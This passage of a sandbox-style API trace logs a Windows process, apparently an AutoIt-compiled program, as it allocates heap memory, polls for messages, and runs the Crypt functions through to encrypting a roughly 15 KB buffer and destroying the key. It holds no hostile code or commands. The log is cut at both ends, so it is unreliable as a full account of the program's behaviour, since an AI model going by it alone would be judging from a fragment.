lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.960] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.960] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.960] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0037.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.961] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.961] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.961] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.961] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.962] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.962] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.962] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.962] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.962] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x3d1d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3d20) returned 1 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] CharLowerBuffW (in: lpsz="byte[15649]", cchLength=0xb | out: lpsz="byte[15649]") returned 0xb [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.963] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.963] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xacb790*, pdwDataLen=0x6ae220*=0x3d1d, dwBufLen=0x3d20 | out: pbData=0xacb790*, pdwDataLen=0x6ae220*=0x3d20) returned 1 [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.963] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.964] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.964] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.964] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.964] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.964] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.964] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.964] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.965] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.965] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.965] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.965] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.965] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.966] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.966] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.966] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.966] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.966] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.966] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.967] CryptDestroyKey (hKey=0x7c2200) returned 1 [0037.967] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.967] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.967] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.967] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.967] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.967] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.967] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.967] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.968] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.968] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.968] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.968] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.968] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.968] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.968] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.968] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.968] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.969] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.969] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, 